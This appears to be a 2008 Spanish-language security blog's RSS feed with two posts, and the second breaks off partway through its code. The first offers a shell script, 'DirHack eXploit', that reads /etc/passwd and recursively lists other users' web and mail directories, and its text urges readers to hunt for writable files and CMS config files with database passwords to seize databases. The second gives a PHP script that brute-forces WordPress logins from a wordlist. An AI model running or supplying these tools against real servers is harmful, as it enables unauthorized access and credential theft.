<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.2.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>/home/zerial</title>
	<link>http://blog.zerial.org</link>
	<description>blog . zerial . org</description>
	<pubDate>Sun, 05 Oct 2008 01:05:08 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.2</generator>
	<language>en</language>
			<item>
		<title>dirHack</title>
		<link>http://blog.zerial.org/2008/10/04/dirhack/</link>
		<comments>http://blog.zerial.org/2008/10/04/dirhack/#comments</comments>
		<pubDate>Sun, 05 Oct 2008 01:05:08 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Programación]]></category>

		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/10/04/dirhack/</guid>
		<description><![CDATA[El siguiente script sirve para hacer auditorias de seguridad en cuanto a los permisos en la estructura de directorios de nuestros servidores.




#!/bin/sh


# Written by Zerial &#38;amp; Pons


# McDonald&#8217;s Day &#8230;


# 21.34, Jun 13 2006 - Updated: 01.41, Jun 15 2006


# # # # # # # # # # # # # # # # [...]]]></description>
			<content:encoded><![CDATA[<p>El siguiente script sirve para hacer auditorias de seguridad en cuanto a los permisos en la estructura de directorios de nuestros servidores.</p>
<blockquote>
<div class="dean_ch" style="white-space: wrap;">
<ol>
<li class="li1">
<div class="de1"><span class="re3">#!/bin/sh</span></div>
</li>
<li class="li1">
<div class="de1"><span class="re3"># Written by Zerial &amp;amp; Pons</span></div>
</li>
<li class="li1">
<div class="de1"><span class="re3"># McDonald</span><span class="st0">&#8217;s Day &#8230;</span></div>
</li>
<li class="li1">
<div class="de1"><span class="st0"># 21.34, Jun 13 2006 - Updated: 01.41, Jun 15 2006</span></div>
</li>
<li class="li2">
<div class="de2"><span class="st0"># # # # # # # # # # # # # # # # # # # # # # # # # #</span></div>
</li>
<li class="li1">
<div class="de1"><span class="st0"># &nbsp;____ &nbsp;_ &nbsp; &nbsp; &nbsp;_ &nbsp; _ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;_</span></div>
</li>
<li class="li1">
<div class="de1"><span class="st0"># | &nbsp;_ (_)_ __| | | | __ _ &nbsp;___| | __</span></div>
</li>
<li class="li1">
<div class="de1"><span class="st0"># | | | | | &#8216;</span>__| |_| |/ _` |/ __| |/ /</div>
</li>
<li class="li1">
<div class="de1"><span class="re3"># | |_| | | | &nbsp;| &nbsp;_ &nbsp;| <span class="br0">&#40;</span>_| | <span class="br0">&#40;</span>__| &nbsp; &lt; # |____/|_|_| &nbsp;|_| |_|__,_|___|_|_</span></div>
</li>
<li class="li2">
<div class="de2"><span class="re3">#</span></div>
</li>
<li class="li1">
<div class="de1"><span class="re3"># # # # # # # # # # # # # # # # # # # # # # # # # #</span></div>
</li>
<li class="li1">
<div class="de1"><span class="re2">version=</span><span class="st0">&quot;1.0.2&quot;</span></div>
</li>
<li class="li1">
<div class="de1"><span class="kw1">if</span> <span class="br0">&#91;</span> <span class="re4">$#</span> -lt <span class="nu0">2</span> <span class="br0">&#93;</span></div>
</li>
<li class="li1">
<div class="de1"><span class="kw1">then</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;DirHack eXploit $version&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;This thing will list all sub-home directories&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;that are accesable by the user running the&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;script.&quot;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> -e <span class="st0">&quot;tusage: $0 id output-file bz2|gz|text (default is text)&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> -e <span class="st0">&quot;texample: $0 999 out bz2&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">break</span></div>
</li>
<li class="li1">
<div class="de1"><span class="kw1">else</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> &gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#91;</span> ! -<span class="kw2">w</span> $<span class="nu0">2</span> <span class="br0">&#93;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">then</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;File $2 doesn&#8217;t have write permissions&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">break</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">fi</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="re2">freedirs=</span><span class="st0">&quot;public_html public_ftp etc tmp mail&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;Starting DirHack $version&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;DirHack eXploit $version&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">for</span> <span class="kw2">dir</span> <span class="kw1">in</span> <span class="re1">$freedirs</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">do</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">for</span> user <span class="kw1">in</span> `<span class="kw2">awk</span> -F<span class="st0">&#8216;:&#8217;</span> <span class="st0">&#8216; {printf $1 &quot;n&quot;} &#8216;</span> /etc/<span class="kw2">passwd</span>`</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">do</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re2">userhome=</span>`<span class="kw2">cat</span> /etc/<span class="kw2">passwd</span> |grep <span class="re1">$user</span>: |grep :$<span class="br0">&#40;</span><span class="kw2">id</span> -u <span class="re1">$user</span><span class="br0">&#41;</span>: |awk -F<span class="st0">&#8216;:&#8217;</span> <span class="st0">&#8216; {printf $6 &quot;n&quot;}&#8217;</span>`</div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re2">fulldir=</span><span class="re1">$userhome</span>/<span class="re1">$dir</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#91;</span> `<span class="kw2">id</span> -u <span class="re1">$user</span>` -gt $<span class="nu0">1</span> <span class="br0">&#93;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">then</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#91;</span> -d <span class="re1">$fulldir</span> <span class="br0">&#93;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">then</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;User: $user&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;Directory: $fulldir&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;Size: `du -sh $fulldir`&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;&quot;</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw2">ls</span> -Rla <span class="re1">$fulldir</span> &gt;&gt; $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">fi</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">fi</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">done</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">done</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">case</span> $<span class="nu0">3</span> <span class="kw1">in</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bz2<span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re2">bzip2=</span>`<span class="kw2">which</span> <span class="kw2">bzip2</span>`</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#91;</span> -x <span class="re1">$bzip</span> <span class="br0">&#93;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">then</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re1">$bzip2</span> -f $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;File ready and compressed in $2.bz2&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">else</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;No exec permissions for bzip2 or bzip2 not found.&quot;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;File left uncompressed in $2&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">fi</span>;;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gz<span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re2">gzip=</span>`<span class="kw2">which</span> <span class="kw2">gzip</span>`</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span> <span class="br0">&#91;</span> -x <span class="re1">$gzip</span> <span class="br0">&#93;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">then</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re1">$gzip</span> -f $<span class="nu0">2</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;File ready and compressed in $2.gz&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">else</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;No exec permissions for gzip or gzip not found.&quot;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;File left uncompressed in $2&quot;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">fi</span>;;</div>
</li>
<li class="li1">
<div class="de1">&nbsp;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw3">echo</span> <span class="st0">&quot;File ready in $2&quot;</span>;;</div>
</li>
<li class="li2">
<div class="de2">&nbsp;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">esac</span></div>
</li>
</ol>
</div>
</blockquote>
<p><strong>Funcionamiento:</strong> Lee todos los usuarios desde /etc/passwd y luego, por cada usuario obtenido, ingresa al directorio <em>public_html</em> y lista, recursivamente, todos los directorios y subdirectorios. Generalmente, el usuario en el que corre apache se llama <em>apache</em> y obviamente, debe tener acceso de lectura a todos los directorios y ficheros que se desean mostrar, por ejemplo /home/user/public_html/index.php.</p>
<p>Si no tiene permisos de lectura para apache dificilmente se podria ingresar via web. Muchas veces, estos ficheros tienen permisos de escritura y de lectura y es cuando hay que actuar. Si no encontramos ficheros con permisos de escritura no importa, al menos tenemos acceso para leerlos. Por ejemplo, en los CMS mas populares como Wordpress, Joomla, etc. suelen tener un fichero de configuracion con el usuario y clave, en texto plato, de la base de datos con lo que podemos generar un script que nos permita ingresar y/o apoderarnos de esa base de datos.<br />
Este script nos creara un listado, en txt (opcionalmente comprimido en gz o bz), con todos los ficheros y sus permisos, para que podamos indagar en la estructura de directorios.<br />
Una forma de solucionar este problema es con <em>chroot</em>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/2008/10/04/dirhack/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Web Login por fuerza bruta</title>
		<link>http://blog.zerial.org/2008/10/04/web-login-por-fuerza-bruta/</link>
		<comments>http://blog.zerial.org/2008/10/04/web-login-por-fuerza-bruta/#comments</comments>
		<pubDate>Sat, 04 Oct 2008 20:24:50 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Programación]]></category>

		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/2008/10/04/web-login-por-fuerza-bruta/</guid>
		<description><![CDATA[Wordpress no cuenta con un captcha por defecto ni tampoco con login throttling, o algo que limite los intentos de ingreso de usuario y clave para los usuarios, por lo que practicar fuerza bruta para ingresar como alguno de los usuarios registrados es algo que podemos intentar. Muchos sistemas de ingreso no cuentan con este [...]]]></description>
			<content:encoded><![CDATA[<p>Wordpress no cuenta con un captcha por defecto ni tampoco con <em>login throttling</em>, o algo que limite los intentos de ingreso de usuario y clave para los usuarios, por lo que practicar fuerza bruta para ingresar como alguno de los usuarios registrados es algo que podemos intentar. Muchos sistemas de ingreso no cuentan con este tipo de proteccion o validacion, por lo que este escript no solo se puede usar contra wordpress.</p>
<p>Hemos escrito un pequeño programa en PHP que nos permitira hacer post al sistema de login de wordpress probando claves desde un diccionario de palabras.</p>
<blockquote>
<div class="dean_ch" style="white-space: wrap;">
<ol>
<li class="li1">
<div class="de1">&lt; ?php</div>
</li>
<li class="li1">
<div class="de1"><a href="http://www.php.net/ini_set"><span class="kw3">ini_set</span></a><span class="br0">&#40;</span><span class="st0">&quot;memory_limit&quot;</span>, <span class="st0">&quot;100M&quot;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1"><span class="kw2">function</span> crackSite<span class="br0">&#40;</span><span class="re0">$wordlist</span>, <span class="re0">$url</span>, <span class="re0">$user</span>, <span class="re0">$attemps</span> = <span class="nu0">0</span><span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1"><span class="br0">&#123;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span><span class="br0">&#40;</span><span class="re0">$file</span> = <a href="http://www.php.net/file"><span class="kw3">file</span></a><span class="br0">&#40;</span><span class="re0">$wordlist</span><span class="br0">&#41;</span><span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/print"><span class="kw3">print</span></a> <span class="st0">&quot;Read &quot;</span>.<a href="http://www.php.net/count"><span class="kw3">count</span></a><span class="br0">&#40;</span><span class="re0">$file</span><span class="br0">&#41;</span>.<span class="st0">&quot; words.n&quot;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">else</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#123;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/print"><span class="kw3">print</span></a> <span class="st0">&quot;Can&#8217;t read word list file.n&quot;</span>;</div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/die"><span class="kw3">die</span></a><span class="br0">&#40;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$i</span> = <span class="nu0">0</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/rtrim"><span class="kw3">rtrim</span></a><span class="br0">&#40;</span><span class="re0">$fields_string</span>,<span class="st0">&#8216;&amp;amp;&#8217;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">foreach</span><span class="br0">&#40;</span><span class="re0">$file</span> <span class="kw1">as</span> <span class="re0">$word</span><span class="br0">&#41;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#123;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span><span class="br0">&#40;</span>++<span class="re0">$i</span>%<span class="nu0">10</span> == <span class="nu0">0</span><span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/print"><span class="kw3">print</span></a> <span class="st0">&quot;Attempts: &quot;</span>.<span class="re0">$i</span>.<span class="st0">&quot;/&quot;</span>.<a href="http://www.php.net/count"><span class="kw3">count</span></a><span class="br0">&#40;</span><span class="re0">$file</span><span class="br0">&#41;</span>.<span class="st0">&quot; (&quot;</span>.<a href="http://www.php.net/trim"><span class="kw3">trim</span></a><span class="br0">&#40;</span><span class="re0">$word</span><span class="br0">&#41;</span>.<span class="st0">&quot;)n&quot;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$fields_string</span> = <span class="st0">&quot;log=&quot;</span>.<span class="re0">$user</span>.<span class="st0">&quot;&amp;amp;pwd=&quot;</span>.<a href="http://www.php.net/trim"><span class="kw3">trim</span></a><span class="br0">&#40;</span><span class="re0">$word</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$ch</span> = curl_init<span class="br0">&#40;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; curl_setopt<span class="br0">&#40;</span><span class="re0">$ch</span>,CURLOPT_URL,<span class="re0">$url</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; curl_setopt<span class="br0">&#40;</span><span class="re0">$ch</span>,CURLOPT_POSTFIELDS,<span class="re0">$fields_string</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; curl_setopt<span class="br0">&#40;</span><span class="re0">$ch</span>,CURLOPT_RETURNTRANSFER, <span class="kw2">true</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="re0">$result</span> = <a href="http://www.php.net/md5"><span class="kw3">md5</span></a><span class="br0">&#40;</span> curl_exec<span class="br0">&#40;</span><span class="re0">$ch</span><span class="br0">&#41;</span> <span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span><span class="br0">&#40;</span>!<span class="re0">$oresult</span><span class="br0">&#41;</span> <span class="re0">$oresult</span> = <span class="re0">$result</span>;</div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="kw1">if</span><span class="br0">&#40;</span><span class="re0">$oresult</span> != <span class="re0">$result</span><span class="br0">&#41;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#123;</span></div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/print"><span class="kw3">print</span></a> <span class="st0">&quot;Password found: &quot;</span>.<span class="re0">$word</span>.<span class="st0">&quot;n&quot;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/die"><span class="kw3">die</span></a><span class="br0">&#40;</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div>
</li>
<li class="li2">
<div class="de2">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; curl_close<span class="br0">&#40;</span><span class="re0">$ch</span><span class="br0">&#41;</span>;</div>
</li>
<li class="li1">
<div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#125;</span></div>
</li>
<li class="li1">
<div class="de1"><span class="br0">&#125;</span></div>
</li>
<li class="li1">
